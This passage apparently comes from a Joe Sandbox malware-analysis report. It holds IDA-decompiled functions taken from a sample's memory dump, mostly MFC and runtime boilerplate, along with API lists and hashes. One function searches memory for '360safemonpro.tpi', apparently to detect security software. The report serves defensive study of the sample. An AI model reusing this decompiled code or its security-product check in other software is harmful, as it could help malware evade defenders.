						_t13 =  *(E00CACEEE(0, 0, _t32, _t39) + 0xc);
						_v8 = _t13;
						_t14 = FindResourceA(_t13, _a4, "AFX_DIALOG_LAYOUT");
						_v12 = _t14;
						if(_t14 == 0) {
							L7:
							_push(_t29);
							_push(_t22);
							_push(_t32);
							_t30 = E00CBC5A0(_t22, _t26, _t29, _t32, _t41, _t43);
							if(_t30 != 0) {
								E00CB2F0E(_t32);
							}
							_t10 = _t30;
						} else {
							_t23 = _v8;
							_t29 = SizeofResource(_t23, _t14);
							_t18 = LoadResource(_t23, _v12);
							_t41 = _t18;
							if(_t18 == 0) {
								goto L10;
							} else {
								_t22 = LockResource(_t18);
								goto L7;
							}
						}
					}
				}
				return _t10;
			}

0x00cb3170
0x00cb3170
0x00cb3173
0x00cb3174
0x00cb3177
0x00cb317c
0x00cb31fc
0x00cb31fc
0x00cb31fc
0x00cb3191
0x00cb3191
0x00cb3195
0x00000000
0x00cb3197
0x00cb3197
0x00cb3199
0x00cb31a8
0x00cb31ac
0x00cb31af
0x00cb31b5
0x00cb31ba
0x00cb31e0
0x00cb31e0
0x00cb31e1
0x00cb31e2
0x00cb31e8
0x00cb31ef
0x00cb31f3
0x00cb31f3
0x00cb31f8
0x00cb31bc
0x00cb31bc
0x00cb31ca
0x00cb31cd
0x00cb31d3
0x00cb31d5
0x00000000
0x00cb31d7
0x00cb31de
0x00000000
0x00cb31de
0x00cb31d5
0x00cb31ba
0x00cb3195
0x00cb3202

APIs

IsWindow.USER32(00000000), ref: 00CB3187
FindResourceA.KERNEL32(?,00000000,AFX_DIALOG_LAYOUT), ref: 00CB31AF
SizeofResource.KERNEL32(?,00000000), ref: 00CB31C1
LoadResource.KERNEL32(?,00000000), ref: 00CB31CD
LockResource.KERNEL32(00000000), ref: 00CB31D8

Strings

AFX_DIALOG_LAYOUT, xrefs: 00CB31A0

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Resource$FindLoadLockSizeofWindow
String ID: AFX_DIALOG_LAYOUT
API String ID: 2582447065-2436846380
Opcode ID: 0d0506b3ba4d206894a1fe8d5b8de90d7ce76dd719de2b8abc0f86c548396a5e
Instruction ID: 0ffe726d06828038004210df05b3a05299d965d5677fe580bcdf7b574ccc7080
Opcode Fuzzy Hash: 0d0506b3ba4d206894a1fe8d5b8de90d7ce76dd719de2b8abc0f86c548396a5e
Instruction Fuzzy Hash: DC118E71600205AFDB215BAACC49AEF7ABDEB85750F144025F811E3251EA75DF40E760

Uniqueness

Uniqueness Score: -1.00%

Function 00CB8549 Relevance: 10.6, APIs: 7, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00CB8549(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
				signed int _v8;
				struct tagRECT _v24;
				void* __edi;
				void* __esi;
				signed int _t15;
				struct HWND__* _t20;
				void* _t29;
				void* _t32;
				struct HWND__* _t34;
				struct HWND__* _t35;
				signed int _t36;

				_t15 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t15 ^ _t36;
				_t34 = _a4;
				ClientToScreen(_t34,  &_a8);
				_t35 = GetWindow(_t34, 5);
				if(_t35 == 0) {
					L6:
					_t20 = 0;
				} else {
					do {
						if(GetDlgCtrlID(_t35) == 0xffff || (GetWindowLongA(_t35, 0xfffffff0) & 0x10000000) == 0) {
							goto L5;
						} else {
							_v24.left = 0;
							_v24.top = 0;
							_v24.right = 0;
							_v24.bottom = 0;
							GetWindowRect(_t35,  &_v24);
							_push(_a12);
							if(PtInRect( &_v24, _a8) != 0) {
								_t20 = _t35;
							} else {
								goto L5;
							}
						}
						goto L7;
						L5:
						_t35 = GetWindow(_t35, 2);
					} while (_t35 != 0);
					goto L6;
				}
				L7:
				return E00DDCBCE(_t20, _t29, _v8 ^ _t36, _t32, 0, _t35);
			}

0x00cb854f
0x00cb8556
0x00cb855a
0x00cb8563
0x00cb8572
0x00cb8576
0x00cb85d2
0x00cb85d2
0x00cb8578
0x00cb857a
0x00cb8586
0x00000000
0x00cb8598
0x00cb859b
0x00cb85a0
0x00cb85a3
0x00cb85a6
0x00cb85a9
0x00cb85af
0x00cb85c1
0x00cb85e4
0x00000000
0x00000000
0x00000000
0x00cb85c1
0x00000000
0x00cb85c3
0x00cb85cc
0x00cb85ce
0x00000000
0x00cb857a
0x00cb85d4
0x00cb85e1

APIs

ClientToScreen.USER32(?,?), ref: 00CB8563
GetWindow.USER32(?,00000005), ref: 00CB856C
GetDlgCtrlID.USER32 ref: 00CB857B
GetWindowLongA.USER32 ref: 00CB858B
GetWindowRect.USER32 ref: 00CB85A9
PtInRect.USER32(?,?,?), ref: 00CB85B9
GetWindow.USER32(00000000,00000002), ref: 00CB85C6

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: 2f30b780d73f1320c25feb972f84d40da6db1f8273ba02ca9fe4141614ec6ef7
Instruction ID: bd4ef455bada53c375f29737d0954b4c3f0d2d0dd97af5e2ca76b8f0c60df89f
Opcode Fuzzy Hash: 2f30b780d73f1320c25feb972f84d40da6db1f8273ba02ca9fe4141614ec6ef7
Instruction Fuzzy Hash: 08116A3190552AAFDB22DF6A9D08EEF7BBCEF44701F008156F811E2250DB349A09CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00D00B71 Relevance: 10.5, APIs: 7, Instructions: 49
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D00B71(intOrPtr* __ecx, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr* _t23;
				intOrPtr _t24;

				_t24 = _a8;
				_t23 = __ecx;
				if( *0xe8738c != 0) {
					EnableMenuItem( *(_t24 + 4), 0x4212, 1);
					EnableMenuItem( *(_t24 + 4), 0x4213, 1);
					EnableMenuItem( *(_t24 + 4), 0x4214, 1);
					EnableMenuItem( *(_t24 + 4), 0x4211, 1);
					EnableMenuItem( *(_t24 + 4), 0x4215, 1);
					EnableMenuItem( *(_t24 + 4), 0x420e, 1);
					EnableMenuItem( *(_t24 + 4), 0x420f, 1);
				}
				E00CF0C2E(_t23, _a4, _t24);
				return 1;
			}

0x00d00b78
0x00d00b84
0x00d00b86
0x00d00b91
0x00d00ba0
0x00d00baf
0x00d00bbe
0x00d00bcd
0x00d00bdc
0x00d00beb
0x00d00beb
0x00d00bf7
0x00d00c02

APIs

EnableMenuItem.USER32 ref: 00D00B91
EnableMenuItem.USER32 ref: 00D00BA0
EnableMenuItem.USER32 ref: 00D00BAF
EnableMenuItem.USER32 ref: 00D00BBE
EnableMenuItem.USER32 ref: 00D00BCD
EnableMenuItem.USER32 ref: 00D00BDC
EnableMenuItem.USER32 ref: 00D00BEB

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: EnableItemMenu
String ID:
API String ID: 1841910628-0
Opcode ID: 48123052f903b2f7aaa979b81bb82c5ac8b5cea83ec9de2fe737768745ac028d
Instruction ID: fe74a6f16ea2307249d09ddfdd2f2493e90dfb3a0dacfc02366bc2df86bb9da5
Opcode Fuzzy Hash: 48123052f903b2f7aaa979b81bb82c5ac8b5cea83ec9de2fe737768745ac028d
Instruction Fuzzy Hash: CA01B171285204FFE7101F41DD8ACA6BBBDEB24F66F008426B39B614F1C7B15C549B20

Uniqueness

Uniqueness Score: -1.00%

Function 00CA478C Relevance: 10.5, APIs: 7, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00CA478C(void* __ebx, intOrPtr* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t53;
				signed int _t62;
				void* _t63;
				intOrPtr _t64;
				intOrPtr _t69;
				void* _t71;
				void* _t72;
				intOrPtr _t73;
				void* _t74;
				void* _t79;
				void* _t81;
				void* _t83;
				signed int _t89;
				signed int _t90;
				intOrPtr* _t97;
				intOrPtr _t98;
				void* _t100;
				intOrPtr _t105;
				intOrPtr _t107;
				intOrPtr* _t116;
				void* _t117;
				signed int _t118;
				signed int _t119;
				void* _t123;

				_push(8);
				E00DDD52C(0xe07bd7, __ebx, __edi, __esi);
				E00DDE064(_t123 - 0x14, 0);
				 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
				_t116 =  *0xe897a8; // 0x15cb308
				 *((intOrPtr*)(_t123 - 0x10)) = _t116;
				_t53 = E00CA340B( *((intOrPtr*)(_t123 + 8)), E00CA3391(0xe88e10));
				_t121 = _t53;
				if(_t53 != 0) {
					L5:
					E00DDE0BC(_t123 - 0x14);
					return E00DDD4FA(_t121);
				} else {
					if(_t116 == 0) {
						_push( *((intOrPtr*)(_t123 + 8)));
						_push(_t123 - 0x10);
						__eflags = E00CA347E(__ebx, _t116, _t121, __eflags) - 0xffffffff;
						if(__eflags == 0) {
							E00CA3218();
							asm("int3");
							_push(0x1c);
							E00DDD595(0xe07c01, __ebx, _t116, _t121);
							 *((intOrPtr*)(_t123 - 0x1c)) = __edx;
							_t97 = __edx;
							 *(_t123 - 0x18) = 0xe88e70;
							__eflags = 0;
							_t117 = __edx + 1;
							do {
								_t62 =  *_t97;
								_t97 = _t97 + 1;
								__eflags = _t62;
							} while (_t62 != 0);
							_t63 =  *0xe88e70; // 0xe3fd24
							_t98 = _t97 - _t117;
							 *((intOrPtr*)(_t123 - 0x14)) = _t98;
							_t17 = _t63 + 4; // 0x8
							_t64 =  *_t17;
							_t18 = _t64 + 0xe88e94; // 0x0
							_t89 =  *_t18;
							_t19 = _t64 + 0xe88e90; // 0x0
							_t118 =  *_t19;
							__eflags = _t89;
							if(__eflags < 0) {
								L16:
								asm("xorps xmm0, xmm0");
								asm("movlpd [ebp-0x28], xmm0");
								_t89 =  *(_t123 - 0x24);
								_t119 =  *(_t123 - 0x28);
							} else {
								if(__eflags > 0) {
									L15:
									_t119 = _t118 - _t98;
									asm("sbb ebx, esi");
								} else {
									__eflags = _t118;
									if(__eflags <= 0) {
										goto L16;
									} else {
										__eflags = _t89;
										if(__eflags < 0) {
											goto L16;
										} else {
											if(__eflags > 0) {
												goto L15;
											} else {
												__eflags = _t118 - _t98;
												if(__eflags <= 0) {
													goto L16;
												} else {
													goto L15;
												}
											}
										}
									}
								}
							}
							_push(0xe88e70);
							E00CA4C6F(_t89, _t123 - 0x28, _t119, 0, __eflags);
							 *(_t123 - 4) = 0;
							__eflags =  *(_t123 - 0x24);
							if( *(_t123 - 0x24) != 0) {
								 *(_t123 - 4) = 1;
								_t100 =  *0xe88e70; // 0xe3fd24
								_t26 = _t100 + 4; // 0x8
								_t27 =  *_t26 + 0xe88e84; // 0x201
								__eflags = ( *_t27 & 0x000001c0) - 0x40;
								if(( *_t27 & 0x000001c0) == 0x40) {
									L25:
									_t31 = _t100 + 4; // 0x8
									_t69 =  *_t31;
									_t33 = _t69 + 0xe88ea8; // 0xe88ec0
									_t71 =  *((intOrPtr*)( *((intOrPtr*)( *_t33)) + 0x24))( *((intOrPtr*)(_t123 - 0x1c)),  *((intOrPtr*)(_t123 - 0x14)), 0);
									__eflags = _t71 -  *((intOrPtr*)(_t123 - 0x14));
									if(_t71 !=  *((intOrPtr*)(_t123 - 0x14))) {
										goto L31;
									} else {
										__eflags = 0xe88e70;
										if(0xe88e70 != 0) {
											goto L31;
										} else {
											while(1) {
												__eflags = _t89;
												if(__eflags < 0) {
													break;
												}
												if(__eflags > 0) {
													L30:
													_t79 =  *0xe88e70; // 0xe3fd24
													_t37 = _t79 + 4; // 0x8
													_t105 =  *_t37;
													_t38 = _t105 + 0xe88eb0; // 0x20
													_t39 = _t105 + 0xe88ea8; // 0xe88ec0
													_t81 = E00CA4E46( *_t39,  *_t38 & 0x000000ff);
													__eflags = _t81 - 0xffffffff;
													if(_t81 != 0xffffffff) {
														_t119 = _t119 + 0xffffffff;
														asm("adc ebx, 0xffffffff");
														continue;
													} else {
														goto L31;
													}
												} else {
													__eflags = _t119;
													if(_t119 <= 0) {
														break;
													} else {
														goto L30;
													}
												}
												goto L34;
											}
											_t90 = 0;
										}
									}
								} else {
									while(1) {
										__eflags = _t89;
										if(__eflags < 0) {
											goto L25;
										}
										if(__eflags > 0) {
											L23:
											_t28 = _t100 + 4; // 0x8
											_t107 =  *_t28;
											_t29 = _t107 + 0xe88eb0; // 0x20
											_t30 = _t107 + 0xe88ea8; // 0xe88ec0
											_t83 = E00CA4E46( *_t30,  *_t29 & 0x000000ff);
											__eflags = _t83 - 0xffffffff;
											if(_t83 == 0xffffffff) {
												L31:
												_t90 = 4;
											} else {
												_t100 =  *0xe88e70; // 0xe3fd24
												_t119 = _t119 + 0xffffffff;
												asm("adc ebx, 0xffffffff");
												continue;
											}
										} else {
											__eflags = _t119;
											if(_t119 <= 0) {
												goto L25;
											} else {
												goto L23;
											}
										}
										goto L34;
									}
									goto L25;
								}
								L34:
								_t72 =  *0xe88e70; // 0xe3fd24
								_t40 = _t72 + 4; // 0x8
								_t73 =  *_t40;
								 *((intOrPtr*)(_t73 + 0xe88e90)) = 0;
								 *((intOrPtr*)(_t73 + 0xe88e94)) = 0;
								 *(_t123 - 4) = 0;
							} else {
								_t90 = 4;
							}
							_t74 =  *0xe88e70; // 0xe3fd24
							_t44 = _t74 + 4; // 0x8
							__eflags =  *( *_t44 +  *(_t123 - 0x18) + 0xc) | _t90;
							E00CA4722( *_t44 +  *(_t123 - 0x18),  *( *_t44 +  *(_t123 - 0x18) + 0xc) | _t90, 0);
							E00CA4C1F(_t90, _t119, __eflags);
							return E00DDD4FA( *(_t123 - 0x18));
						} else {
							_t121 =  *((intOrPtr*)(_t123 - 0x10));
							 *((intOrPtr*)(_t123 - 0x10)) = _t121;
							 *(_t123 - 4) = 1;
							E00DDE215(__eflags, _t121);
							 *((intOrPtr*)( *_t121 + 4))();
							 *0xe897a8 = _t121;
							goto L5;
						}
					} else {
						_t121 = _t116;
						goto L5;
					}
				}
			}

0x00ca478c
0x00ca4793
0x00ca479d
0x00ca47a2
0x00ca47ab
0x00ca47b1
0x00ca47bd
0x00ca47c2
0x00ca47c6
0x00ca4801
0x00ca4804
0x00ca4810
0x00ca47c8
0x00ca47ca
0x00ca47d0
0x00ca47d6
0x00ca47de
0x00ca47e1
0x00ca4811
0x00ca4816
0x00ca4817
0x00ca481e
0x00ca4825
0x00ca4828
0x00ca482f
0x00ca4832
0x00ca4834
0x00ca4837
0x00ca4837
0x00ca4839
0x00ca483a
0x00ca483a
0x00ca483e
0x00ca4843
0x00ca4845
0x00ca4848
0x00ca4848
0x00ca484b
0x00ca484b
0x00ca4851
0x00ca4851
0x00ca4857
0x00ca4859
0x00ca4871
0x00ca4871
0x00ca4874
0x00ca4879
0x00ca487c
0x00ca485b
0x00ca485b
0x00ca486b
0x00ca486b
0x00ca486d
0x00ca485d
0x00ca485d
0x00ca485f
0x00000000
0x00ca4861
0x00ca4861
0x00ca4863
0x00000000
0x00ca4865
0x00ca4865
0x00000000
0x00ca4867
0x00ca4867
0x00ca4869
0x00000000
0x00000000
0x00000000
0x00000000
0x00ca4869
0x00ca4865
0x00ca4863
0x00ca485f
0x00ca485b
0x00ca487f
0x00ca4883
0x00ca4888
0x00ca488b
0x00ca488f
0x00ca4899
0x00ca489d
0x00ca48a3
0x00ca48a6
0x00ca48b1
0x00ca48b4
0x00ca48e9
0x00ca48e9
0x00ca48e9
0x00ca48f0
0x00ca48fb
0x00ca48fe
0x00ca4901
0x00000000
0x00ca4903
0x00ca4903
0x00ca4905
0x00000000
0x00ca4907
0x00ca4907
0x00ca4907
0x00ca4909
0x00000000
0x00000000
0x00ca490b
0x00ca4911
0x00ca4911
0x00ca4916
0x00ca4916
0x00ca4919
0x00ca4920
0x00ca4927
0x00ca492c
0x00ca492f
0x00ca4936
0x00ca4939
0x00000000
0x00000000
0x00000000
0x00000000
0x00ca490d
0x00ca490d
0x00ca490f
0x00000000
0x00000000
0x00000000
0x00000000
0x00ca490f
0x00000000
0x00ca490b
0x00ca493e
0x00ca493e
0x00ca4905
0x00ca48b6
0x00ca48b6
0x00ca48b6
0x00ca48b8
0x00000000
0x00000000
0x00ca48ba
0x00ca48c0
0x00ca48c0
0x00ca48c0
0x00ca48c3
0x00ca48ca
0x00ca48d1
0x00ca48d6
0x00ca48d9
0x00ca4931
0x00ca4933
0x00ca48db
0x00ca48db
0x00ca48e1
0x00ca48e4
0x00000000
0x00ca48e4
0x00ca48bc
0x00ca48bc
0x00ca48be
0x00000000
0x00000000
0x00000000
0x00000000
0x00ca48be
0x00000000
0x00ca48ba
0x00000000
0x00ca48b6
0x00ca4940
0x00ca4940
0x00ca4945
0x00ca4945
0x00ca4948
0x00ca494e
0x00ca4979
0x00ca4891
0x00ca4893
0x00ca4893
0x00ca497c
0x00ca4982
0x00ca498b
0x00ca498e
0x00ca4996
0x00ca49a3
0x00ca47e3
0x00ca47e3
0x00ca47e6
0x00ca47ea
0x00ca47ee
0x00ca47f8
0x00ca47fb
0x00000000
0x00ca47fb
0x00ca47cc
0x00ca47cc
0x00000000
0x00ca47cc
0x00ca47ca

APIs

__EH_prolog3.LIBCMT ref: 00CA4793
std::_Lockit::_Lockit.LIBCPMT ref: 00CA479D
int.LIBCPMT ref: 00CA47B4

Part of subcall function 00CA3391: std::_Lockit::_Lockit.LIBCPMT ref: 00CA33A2
Part of subcall function 00CA3391: std::_Lockit::~_Lockit.LIBCPMT ref: 00CA33BC

ctype.LIBCPMT ref: 00CA47D7
std::_Facet_Register.LIBCPMT ref: 00CA47EE
std::_Lockit::~_Lockit.LIBCPMT ref: 00CA4804
Concurrency::cancel_current_task.LIBCPMT ref: 00CA4811

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
String ID:
API String ID: 2958136301-0
Opcode ID: 22d8ae0d01d58ca924eb667f5a4b9bc4ccc7c7ee4be0e6757f4983f1edd8ca31
Instruction ID: bf8ad7297b9d33656675ceb2178780872ea0e58c6e6eddc27e6fac766b190a7b
Opcode Fuzzy Hash: 22d8ae0d01d58ca924eb667f5a4b9bc4ccc7c7ee4be0e6757f4983f1edd8ca31
Instruction Fuzzy Hash: 7001C0318001169BCB05ABA098566BE7BA1FF85324F240509F514AB3D2DF759A04CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CA49D6 Relevance: 10.5, APIs: 7, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00CA49D6(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8, signed int _a12) {
				signed int _v4;
				void* _v16;
				char _v20;
				void* _t25;
				signed int _t26;
				signed int _t27;
				signed int _t30;
				signed int _t32;
				signed int _t34;
				void* _t39;
				void* _t46;
				void* _t52;
				signed int _t53;
				intOrPtr* _t56;
				signed int _t58;
				void* _t60;
				void* _t64;
				void* _t65;

				_push(8);
				E00DDD52C(0xe07bd7, __ebx, __edi, __esi);
				E00DDE064( &_v20, 0);
				_v4 = _v4 & 0x00000000;
				_t52 =  *0xe897ac; // 0x0
				_v16 = _t52;
				_t56 = E00CA340B(_a8, E00CA3391(0xe89894));
				if(_t56 != 0) {
					L5:
					E00DDE0BC( &_v20);
					return E00DDD4FA(_t56);
				} else {
					if(_t52 == 0) {
						_push(_a8);
						_push( &_v16);
						_t25 = E00CA4CE2(__ebx, _t52, _t56, __eflags);
						_pop(_t46);
						__eflags = _t25 - 0xffffffff;
						if(__eflags == 0) {
							_t26 = E00CA3218();
							asm("int3");
							_push(__ebx);
							_push(_t56);
							_push(_t52);
							_t53 = _a12;
							_t39 = _t46;
							__eflags = _t53 - __edx;
							if(_t53 > __edx) {
								L14:
								_t27 = _t26 | 0xffffffff;
								__eflags = _t27;
							} else {
								__eflags = _t53;
								if(_t53 != 0) {
									_t30 = _t39 - _t53 + __edx + 1;
									_a12 = _t30;
									_push(_t30 - _t39);
									_push(0x33);
									_push(_t39);
									while(1) {
										_t26 = E00DE0D40();
										_t58 = _t26;
										_t65 = _t64 + 0xc;
										__eflags = _t58;
										if(_t58 == 0) {
											goto L14;
										}
										_t32 = E00DDFDA6(_t58, "360safemonpro.tpi", _t53);
										_t64 = _t65 + 0xc;
										__eflags = _t32;
										if(_t32 == 0) {
											_t27 = _t58 - _t39;
										} else {
											_t60 = _t58 + 1;
											_t34 = _a12 - _t60;
											__eflags = _t34;
											_push(_t34);
											_push(0x33);
											_push(_t60);
											continue;
										}
										goto L15;
									}
									goto L14;
								} else {
									_t27 = 0;
								}
							}
							L15:
							return _t27;
						} else {
							_t56 = _v16;
							_v16 = _t56;
							_v4 = 1;
							E00DDE215(__eflags, _t56);
							 *((intOrPtr*)( *_t56 + 4))();
							 *0xe897ac = _t56;
							goto L5;
						}
					} else {
						_t56 = _t52;
						goto L5;
					}
				}
			}

0x00ca49d6
0x00ca49dd
0x00ca49e7
0x00ca49ec
0x00ca49f5
0x00ca49fb
0x00ca4a0c
0x00ca4a10
0x00ca4a4b
0x00ca4a4e
0x00ca4a5a
0x00ca4a12
0x00ca4a14
0x00ca4a1a
0x00ca4a20
0x00ca4a21
0x00ca4a27
0x00ca4a28
0x00ca4a2b
0x00ca4a5b
0x00ca4a60
0x00ca4a64
0x00ca4a65
0x00ca4a66
0x00ca4a67
0x00ca4a6a
0x00ca4a6c
0x00ca4a6e
0x00ca4ab5
0x00ca4ab5
0x00ca4ab5
0x00ca4a70
0x00ca4a70
0x00ca4a72
0x00ca4a7d
0x00ca4a7f
0x00ca4a84
0x00ca4a85
0x00ca4a87
0x00ca4aa7
0x00ca4aa7
0x00ca4aac
0x00ca4aae
0x00ca4ab1
0x00ca4ab3
0x00000000
0x00000000
0x00ca4a91
0x00ca4a96
0x00ca4a99
0x00ca4a9b
0x00ca4abf
0x00ca4a9d
0x00ca4aa0
0x00ca4aa1
0x00ca4aa1
0x00ca4aa3
0x00ca4aa4
0x00ca4aa6
0x00000000
0x00ca4aa6
0x00000000
0x00ca4a9b
0x00000000
0x00ca4a74
0x00ca4a74
0x00ca4a74
0x00ca4a72
0x00ca4ab8
0x00ca4abc
0x00ca4a2d
0x00ca4a2d
0x00ca4a30
0x00ca4a34
0x00ca4a38
0x00ca4a42
0x00ca4a45
0x00000000
0x00ca4a45
0x00ca4a16
0x00ca4a16
0x00000000
0x00ca4a16
0x00ca4a14

APIs

__EH_prolog3.LIBCMT ref: 00CA49DD
std::_Lockit::_Lockit.LIBCPMT ref: 00CA49E7
int.LIBCPMT ref: 00CA49FE

Part of subcall function 00CA3391: std::_Lockit::_Lockit.LIBCPMT ref: 00CA33A2
Part of subcall function 00CA3391: std::_Lockit::~_Lockit.LIBCPMT ref: 00CA33BC

codecvt.LIBCPMT ref: 00CA4A21
std::_Facet_Register.LIBCPMT ref: 00CA4A38
std::_Lockit::~_Lockit.LIBCPMT ref: 00CA4A4E
Concurrency::cancel_current_task.LIBCPMT ref: 00CA4A5B

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
String ID:
API String ID: 2133458128-0
Opcode ID: 0dee7e09acdb89e95add3b9a86dcb38bab8cd5f60d1855f5409cf5ab4cbbeb66
Instruction ID: 41aa737fa25a790d1efa9868df6064dfb4f5c062cff914d85a3940d5bcfc73e8
Opcode Fuzzy Hash: 0dee7e09acdb89e95add3b9a86dcb38bab8cd5f60d1855f5409cf5ab4cbbeb66
Instruction Fuzzy Hash: 2701D231C402169FCB08FFA488566BE7B60EF81314F244509F5247B382DFB09E05DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CBCA59 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E00CBCA59(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				_Unknown_base(*)()* _t6;
				struct HINSTANCE__* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t13;

				_t6 =  *0xe87040; // 0x0
				if(_t6 != 0) {
					__imp__DecodePointer(_t6);
					_t13 = _t6;
					L4:
					if(_t13 == 0) {
						L6:
						return 0;
					}
					 *0xe17a64(_a4, _a8, _a12, _a16, _a20);
					return  *_t13();
				}
				_t10 = GetModuleHandleW(L"uxtheme.dll");
				if(_t10 == 0) {
					goto L6;
				}
				_t11 = GetProcAddress(_t10, "BeginBufferedPaint");
				_t13 = _t11;
				__imp__EncodePointer(_t13);
				 *0xe87040 = _t11;
				goto L4;
			}

0x00cbca5c
0x00cbca64
0x00cbca92
0x00cbca98
0x00cbca9a
0x00cbca9c
0x00cbcab9
0x00000000
0x00cbcab9
0x00cbcaaf
0x00000000
0x00cbcab5
0x00cbca6b
0x00cbca73
0x00000000
0x00000000
0x00cbca7b
0x00cbca81
0x00cbca84
0x00cbca8a
0x00000000

APIs

GetModuleHandleW.KERNEL32(uxtheme.dll), ref: 00CBCA6B
GetProcAddress.KERNEL32(00000000,BeginBufferedPaint), ref: 00CBCA7B
EncodePointer.KERNEL32(00000000), ref: 00CBCA84
DecodePointer.KERNEL32(00000000), ref: 00CBCA92

Strings

BeginBufferedPaint, xrefs: 00CBCA75
uxtheme.dll, xrefs: 00CBCA66

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
